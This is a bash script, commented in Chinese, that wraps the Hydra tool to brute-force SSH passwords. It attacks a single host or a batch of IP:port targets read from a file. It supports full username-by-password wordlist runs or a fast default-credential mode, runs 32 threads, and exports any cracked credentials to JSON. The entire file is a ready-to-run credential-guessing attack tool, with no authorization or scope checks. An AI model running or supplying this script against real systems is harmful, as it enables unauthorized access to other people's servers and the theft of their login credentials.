#!/bin/bash # ================================================ # Hydra SSH 暴力破解包装脚本 # ================================================ # 对外部工具 Hydra (thc-hydra) 的封装，提供： # - 快速单目标破解 # - 批量目标破解 # - 自定义字典 + 内置字典 # - 结果自动导出JSON # # 前置要求：brew install hydra (macOS) / apt install hydra (Linux) # # 用法： # ./hydra_wrapper.sh single [PORT] # 单目标 # ./hydra_wrapper.sh batch # 批量 # ./hydra_wrapper.sh single --fast # 快速模式（仅Top50凭证） # ================================================ set -euo pipefail SCRIPT_DIR="$(cd "$(dirname "$0")" && pwd)" REFS_DIR="$SCRIPT_DIR/../references" RESULTS_DIR="$SCRIPT_DIR/../results" mkdir -p "$RESULTS_DIR" # 字典文件 USER_DICT="$REFS_DIR/ssh_usernames.txt" PASS_DICT="$REFS_DIR/ssh_passwords_top500.txt" COMBO_DICT="$REFS_DIR/ssh_default_credentials.txt" # 默认参数 THREADS=32 TIMEOUT=15 SSH_PORT=22 # 颜色输出 RED='\033[0;31m' GREEN='\033[0;32m' YELLOW='\033[1;33m' NC='\033[0m' usage() { echo "用法：" echo " $0 single [PORT] [--fast]" echo " $0 batch [--fast]" echo "" echo "参数：" echo " single 单目标破解" echo " batch 批量破解（targets_file每行一个IP或IP:PORT）" echo " --fast 快速模式，仅用组合字典（默认凭证对）" echo "" echo "示例：" echo " $0 single 192.168.1.100" echo " $0 single 192.168.1.100 2222" echo " $0 batch targets.txt" exit 1 } check_hydra() { if ! command -v hydra &> /dev/null; then echo -e "${RED}[!] Hydra 未安装${NC}" echo "安装方法：" echo " macOS: brew install hydra" echo " Ubuntu: sudo apt install hydra" echo " CentOS: sudo yum install hydra" exit 1 fi } # 单目标破解 single_attack() { local TARGET_IP="$1" local TARGET_PORT="${2:-$SSH_PORT}" local FAST_MODE="${3:-false}" local TIMESTAMP=$(date +%Y%m%d_%H%M%S) local OUTPUT_FILE="$RESULTS_DIR/hydra_${TARGET_IP}_${TIMESTAMP}.json" echo -e "${YELLOW}[*] SSH暴力破解: $TARGET_IP:$TARGET_PORT${NC}" if [ "$FAST_MODE" = "true" ]; then echo "[*] 快速模式：使用组合字典" hydra -C "$COMBO_DICT" \ -s "$TARGET_PORT" \ -t "$THREADS" \ -w "$TIMEOUT" \ -o "$OUTPUT_FILE" \ -b json \ "$TARGET_IP" ssh else echo "[*] 完整模式：用户名×密码字典" hydra -L "$USER_DICT" \ -P "$PASS_DICT" \ -s "$TARGET_PORT" \ -t "$THREADS" \ -w "$TIMEOUT" \ -o "$OUTPUT_FILE" \ -b json \ -e nsr \ "$TARGET_IP" ssh fi if [ -f "$OUTPUT_FILE" ] && [ -s "$OUTPUT_FILE" ]; then echo -e "${GREEN}[+] 发现凭证! 结果已保存: $OUTPUT_FILE${NC}" cat "$OUTPUT_FILE" else echo -e "${RED}[-] 未发现有效凭证${NC}" fi } # 批量破解 batch_attack() { local TARGETS_FILE="$1" local FAST_MODE="${2:-false}" if [ ! -f "$TARGETS_FILE" ]; then echo -e "${RED}[!] 目标文件不存在: $TARGETS_FILE${NC}" exit 1 fi local TOTAL=$(grep -c -v '^$\|^#' "$TARGETS_FILE" || true) local CURRENT=0 echo -e "${YELLOW}[*] 批量SSH暴力破解: $TOTAL 个目标${NC}" while IFS= read -r line; do [[ -z "$line" || "$line" =~ ^# ]] && continue ((CURRENT++)) || true # 解析 IP:PORT local IP PORT if [[ "$line" == *":"* ]]; then IP="${line%%:*}" PORT="${line##*:}" else IP="$line" PORT="$SSH_PORT" fi echo -e "\n${YELLOW}[$CURRENT/$TOTAL] $IP:$PORT${NC}" single_attack "$IP" "$PORT" "$FAST_MODE" || true done < "$TARGETS_FILE" echo -e "\n${GREEN}[+] 批量破解完成！结果目录: $RESULTS_DIR/${NC}" } # 主逻辑 main() { check_hydra if [ $# -lt 2 ]; then usage fi local MODE="$1" shift local FAST_MODE="false" if [[ "${*}" == *"--fast"* ]]; then FAST_MODE="true" fi case "$MODE" in single) single_attack "$1" "${2:-$SSH_PORT}" "$FAST_MODE" ;; batch) batch_attack "$1" "$FAST_MODE" ;; *) usage ;; esac } main "$@"